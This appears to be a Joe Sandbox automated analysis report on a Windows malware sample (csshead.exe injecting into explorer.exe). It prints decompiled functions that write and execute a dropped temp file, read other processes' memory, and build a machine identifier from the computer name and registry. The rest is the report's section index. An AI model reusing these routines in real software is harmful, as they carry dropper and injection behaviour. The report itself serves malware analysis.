Part of subcall function 00774E94: ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 00774EDD

ReadProcessMemory.KERNEL32(?,00000000,?,00001000,?), ref: 00774F3A
ReadProcessMemory.KERNEL32(?,00000000,?,00001000,?), ref: 00774F69
ReadProcessMemory.KERNEL32(00000000,00000000,?,00000018,?), ref: 00774FBC
ReadProcessMemory.KERNEL32(00000000,00000000,?,00001000,?), ref: 00774FED

Part of subcall function 00771440: GetProcessHeap.KERNEL32(00000000,?), ref: 0077144D
Part of subcall function 00771440: HeapFree.KERNEL32(00000000), ref: 00771454

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Function 0077485C, Relevance: 6.0, APIs: 4, Instructions: 46
file

C-Code - Quality: 100%

			E0077485C(CHAR* __eax, long __ecx, void* __edx) {
				CHAR* _v8;
				void* _v12;
				long _v16;
				intOrPtr _v20;
				void* _v24;
				long _v28;

				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_v20 = 0;
				_v24 = CreateFileA(_v8, 0x40000000, 0, 0, 2, 0x80, 0);
				if(_v24 != 0xffffffff) {
					if(WriteFile(_v24, _v12, _v16,  &_v28, 0) != 0 && _v28 == _v16) {
						_v20 = 0xffffffff;
					}
					FlushFileBuffers(_v24);
					CloseHandle(_v24);
				}
				return _v20;
			}

0x00774862
0x00774865
0x00774868
0x0077486d
0x0077488c
0x00774893
0x007748af
0x007748b9
0x007748b9
0x007748c4
0x007748ce
0x007748ce
0x007748da

APIs

CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00774886
WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 007748A7
FlushFileBuffers.KERNEL32(000000FF), ref: 007748C4
CloseHandle.KERNEL32(000000FF), ref: 007748CE

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Function 00777D3C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71

C-Code - Quality: 100%

			E00777D3C(void* __eax, void* __ecx, void* __edx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				char _v85;
				char _v342;
				void* _t34;
				intOrPtr _t42;
				void* _t55;
				intOrPtr _t58;

				_t55 = __ecx;
				_v8 = __eax;
				_v342 = 0;
				GetTempPathA(0x101,  &_v342);
				_v12 = _v8;
				_v16 = 0;
				while(1) {
					_t34 = _v12;
					if( *_t34 == 0) {
						break;
					}
					__eflags =  *_v12 - 0x2f;
					if( *_v12 == 0x2f) {
						_v16 = _v12;
					}
					_t10 =  &_v12;
					 *_t10 = _v12 + 1;
					__eflags =  *_t10;
				}
				if(_v16 != 0) {
					_v16 = _v16 + 1;
					E0077133C( &_v342, _v16);
					if(E00773C28(_v8, _t55,  &_v342) == 0) {
						_t42 =  *0x77a170; // 0x771e04
						return E00777240(_t42, __eflags);
					}
					_t34 = ShellExecuteA(0, 0,  &_v342, 0, 0, 5);
					_v20 = _t34;
					_t66 = _v20 - 0x20;
					if(_v20 <= 0x20) {
						E00771864(_v20,  &_v85);
						_t58 =  *0x77a16c; // 0x771df8
						E00771308( &_v342, _t58);
						E0077133C( &_v342,  &_v85);
						return E00777240( &_v342, _t66);
					}
				}
				return _t34;
			}

0x00777d3c
0x00777d45
0x00777d48
0x00777d5b
0x00777d64
0x00777d69
0x00777d7f
0x00777d7f
0x00777d85
0x00000000
0x00000000
0x00777d71
0x00777d74
0x00777d79
0x00777d79
0x00777d7c
0x00777d7c
0x00777d7c
0x00777d7c
0x00777d8b
0x00777d91
0x00777d9f
0x00777db7
0x00777e1a
0x00000000
0x00777e1f
0x00777dca
0x00777dd0
0x00777dd3
0x00777dd7
0x00777de1
0x00777def
0x00777df5
0x00777e05
0x00000000
0x00777e13
0x00777dd7
0x00777e27

APIs

GetTempPathA.KERNEL32(00000101,00000000), ref: 00777D5B

Part of subcall function 00773C28: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00773E08
Part of subcall function 00773C28: WriteFile.KERNEL32(000000FF,?,00000004,?,00000000), ref: 00773E55
Part of subcall function 00773C28: CloseHandle.KERNEL32(000000FF), ref: 00773E6B

ShellExecuteA.SHELL32(00000000,00000000,?,00000000,00000000,00000005), ref: 00777DCA

Part of subcall function 00771864: wsprintfA.USER32 ref: 00771874

Strings

, xrefs: 00777DD3

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Function 00776900, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58
registry

C-Code - Quality: 92%

			E00776900(intOrPtr __eax, void* __edx) {
				intOrPtr _v8;
				long _v12;
				signed int _v16;
				signed int _v20;
				void* _v24;
				intOrPtr _v117;
				char _v153;
				char* _t30;
				intOrPtr _t35;

				asm("das");
				 *((intOrPtr*)(__eax)) =  *((intOrPtr*)(__eax)) + __eax;
				_v117 = _v117 + __edx;
				_v8 = __eax;
				_v16 = 0;
				_v12 = 0x81;
				if(GetComputerNameA( &_v153,  &_v12) != 0) {
					_v16 = E00771BA8(_v16, E007712DC( &_v153),  &_v153);
				}
				_t30 =  *0x77a25c; // 0x772174
				RegOpenKeyExA(0x80000002, _t30, 0, 0x20119,  &_v24);
				_v12 = 4;
				_v20 = 0;
				_t35 =  *0x77a0f0; // 0x771d3c
				E007738B0(_v24, _t35, 0, 0,  &_v20,  &_v12);
				E00773890(_v24);
				_v16 = _v16 ^ _v20 ^ 0xac67baee;
				return E00771164(_v16, _v8);
			}

0x00776900
0x00776901
0x00776903
0x0077690d
0x00776912
0x00776915
0x0077692f
0x0077694c
0x0077694c
0x0077695a
0x00776965
0x0077696b
0x00776974
0x00776983
0x0077698d
0x00776998
0x007769a8
0x007769b9

APIs

GetComputerNameA.KERNEL32(?,?), ref: 00776927
RegOpenKeyExA.ADVAPI32(80000002,00772174,00000000,00020119,?), ref: 00776965

Part of subcall function 007738B0: RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,00776992,?,00771D3C,00000000,00000000,?,?), ref: 007738CC

Part of subcall function 00773890: RegCloseKey.ADVAPI32(?), ref: 0077389D

Strings

t!w, xrefs: 0077695A

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Function 00776904, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56
registry

C-Code - Quality: 100%

			E00776904(intOrPtr __eax) {
				intOrPtr _v8;
				long _v12;
				signed int _v16;
				signed int _v20;
				void* _v24;
				char _v153;
				char* _t28;
				intOrPtr _t33;

				_v8 = __eax;
				_v16 = 0;
				_v12 = 0x81;
				if(GetComputerNameA( &_v153,  &_v12) != 0) {
					_v16 = E00771BA8(_v16, E007712DC( &_v153),  &_v153);
				}
				_t28 =  *0x77a25c; // 0x772174
				RegOpenKeyExA(0x80000002, _t28, 0, 0x20119,  &_v24);
				_v12 = 4;
				_v20 = 0;
				_t33 =  *0x77a0f0; // 0x771d3c
				E007738B0(_v24, _t33, 0, 0,  &_v20,  &_v12);
				E00773890(_v24);
				_v16 = _v16 ^ _v20 ^ 0xac67baee;
				return E00771164(_v16, _v8);
			}

0x0077690d
0x00776912
0x00776915
0x0077692f
0x0077694c
0x0077694c
0x0077695a
0x00776965
0x0077696b
0x00776974
0x00776983
0x0077698d
0x00776998
0x007769a8
0x007769b9

APIs

GetComputerNameA.KERNEL32(?,?), ref: 00776927
RegOpenKeyExA.ADVAPI32(80000002,00772174,00000000,00020119,?), ref: 00776965

Part of subcall function 007738B0: RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,00776992,?,00771D3C,00000000,00000000,?,?), ref: 007738CC

Part of subcall function 00773890: RegCloseKey.ADVAPI32(?), ref: 0077389D

Strings

t!w, xrefs: 0077695A

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Function 00773EA0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53
registry

C-Code - Quality: 88%

			E00773EA0() {
				signed char _v8;
				void* _v12;
				char _v16;
				char* _t13;
				signed int _t18;
				char* _t25;

				if( *0x77a034 == 0) {
					_t13 =  *0x77a260; // 0x7721a4
					RegCreateKeyExA(0x80000001, _t13, 0, 0, 0, 0xf003f, 0,  &_v12, 0);
				} else {
					_t25 =  *0x77a260; // 0x7721a4
					RegCreateKeyExA(0x80000002, _t25, 0, 0, 0, 0xf003f, 0,  &_v12, 0);
				}
				_v16 = 0;
				_t18 = E007738B0(_v12, "ewhasskz", 0, 0, 0,  &_v16);
				asm("sbb eax, eax");
				_v8 =  ~(_t18 & 0xffffff00 | _v16 != 0x00000000);
				E00773890(_v12);
				return _v8;
			}

0x00773ead
0x00773ee8
0x00773ef3
0x00773eaf
0x00773ec2
0x00773ecd
0x00773ecd
0x00773efb
0x00773f11
0x00773f22
0x00773f24
0x00773f2a
0x00773f35

APIs

RegCreateKeyExA.ADVAPI32(80000002,007721A4,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00773ECD
RegCreateKeyExA.ADVAPI32(80000001,007721A4,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00773EF3

Part of subcall function 007738B0: RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,00776992,?,00771D3C,00000000,00000000,?,?), ref: 007738CC

Part of subcall function 00773890: RegCloseKey.ADVAPI32(?), ref: 0077389D

Strings

ewhasskz, xrefs: 00773F08

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report

Overview

General Information

Detection

Confidence

Classification

Analysis Advice

Signature Overview

AV Detection:

Cryptography:

Spam, unwanted Advertisements and Ransom Demands:

Software Vulnerabilities:

Networking:

Data Obfuscation:

Spreading:

System Summary:

HIPS / PFW / Operating System Protection Evasion:

Anti Debugging:

Malware Analysis System Evasion:

Hooking and other Techniques for Hiding and Protection:

Lowering of HIPS / PFW / Operating System Security Settings:

Language, Device and Operating System Detection:

Behavior Graph

Simulations

Behavior and APIs

Antivirus Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Yara Overview

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Joe Sandbox View / Context

IPs

Domains

ASN

Dropped Files

Screenshots

Startup

Created / dropped Files

Contacted Domains/Contacted IPs

Contacted Domains

Contacted IPs

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Analysis Process: csshead.exe PID: 2236 Parent PID: 3740

General

Chronological Activities

Analysis Process: explorer.exe PID: 972 Parent PID: 2236

Function 0041C95B, Relevance: 193.8, APIs: 88, Strings: 22, Instructions: 1340
windowcomstringCrypto

Function 00419D20, Relevance: 126.7, APIs: 66, Strings: 5, Instructions: 2465
librarycomwindow

Function 00406EEC, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 131
library

Function 00404E94, Relevance: 3.0, APIs: 2, Instructions: 37
native

Function 00402574, Relevance: 53.6, APIs: 14, Strings: 16, Instructions: 1068
library

Function 004260A2, Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 109
librarythread

Function 00403360, Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 241
windowregistry

Function 00405028, Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 215
threadprocessfile

Function 00405026, Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 212
threadprocessfile

Function 00406ECE, Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 163
library

Function 004260A2, Relevance: 13.6, APIs: 9, Instructions: 109
thread

Function 00407C4E, Relevance: 9.1, APIs: 6, Instructions: 66
file

Function 00407C50, Relevance: 9.1, APIs: 6, Instructions: 65
file

Function 00404A68, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
registry

Function 00409230, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48
sleep

Function 004047AC, Relevance: 7.6, APIs: 5, Instructions: 64
file

Function 00406B70, Relevance: 6.1, APIs: 4, Instructions: 121
sleep

Function 00406900, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58
registry

Function 00406904, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56
registry

Function 00409468, Relevance: 3.0, APIs: 2, Instructions: 19
thread

Function 00409470, Relevance: 3.0, APIs: 2, Instructions: 17
thread

Function 004070E5, Relevance: 1.6, APIs: 1, Instructions: 75
registry